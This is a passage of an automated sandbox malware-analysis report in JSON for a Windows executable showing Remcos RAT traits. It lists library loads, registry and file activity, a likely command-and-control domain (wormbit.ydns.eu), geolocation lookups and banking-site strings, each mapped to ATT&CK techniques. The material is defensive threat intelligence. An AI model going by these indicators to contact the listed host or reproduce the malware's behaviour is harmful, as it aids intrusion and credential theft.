"name": "Calls an API typically used to load libraries", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter Iphlpapi (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter Advapi32.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:23101\"\n \"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /json.gp HTTP/1.1\nHost: geoplugin.net\nCache-Control: no-cache\" Response ==> HTTP/1.1 200 OK\ndate: Thu\n 13 Mar 2025 10:32:18 GMT\nserver: Apache\ncontent-length: 961\ncontent-type: application/json; charset=utf-8\ncache-control: public\n max-age=300\naccess-control-allow-origin: * with response body ==>7B0A20202267656F706C7567696E5F72657175657374223A2236342E3132342E31322E313632222C0A20202267656F706C7567696E5F737461747573223A3230.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"geoplugin.net\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"geoplugin.net\"\n \"wormbit.ydns.eu\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76210000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"www.credit-agricole.fr\" (Source: 00000000-00003236.00000001.211920.00280000.00000004.mdmp, 00000000-00003236.00000002.213843.00280000.00000004.mdmp, 00000000-00003236.00000003.219365.00280000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00003236.00000001.211920.00280000.00000004.mdmp, 00000000-00003236.00000002.213843.00280000.00000004.mdmp, 00000000-00003236.00000003.219365.00280000.00000004.mdmp, Indicator: \"capitalone.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" writes a file \"C:\\ProgramData\\remcos\\logs.dat\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" writes a file \"%ALLUSERSPROFILE%\\remcos\\logs.dat\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\RMCRFDCUVIKUIHBIVUYRS-D47AW4\\\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\\PROPERTYBAG\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\KNOWNFOLDERS\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USER SHELL FOLDERS\"; Key: \"\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\PROFILELIST\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\version.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe.Local\\\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe.Local\\\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\6FCBF672E0E5A4D3C3BCC34D4BAD46F94C11FB29FBCA5E1B23CE764DA45BA8FB.EXE.LOCAL\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\ProgramData\\remcos\\LOGS.DAT\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\CKDNCXYS\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" writes file \"c:\\programdata\\remcos\\logs.dat\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\ckdncxys\\json[1].json\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" writes file \"%allusersprofile%\\remcos\\logs.dat\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\CKDNCXYS\\json[1].json\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\History\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\CKDNCXYS\\json[1].json\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\RMCRFDCUVIKUIHBIVUYRS-D47AW4\"; Key: \"OVERRIDE\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: 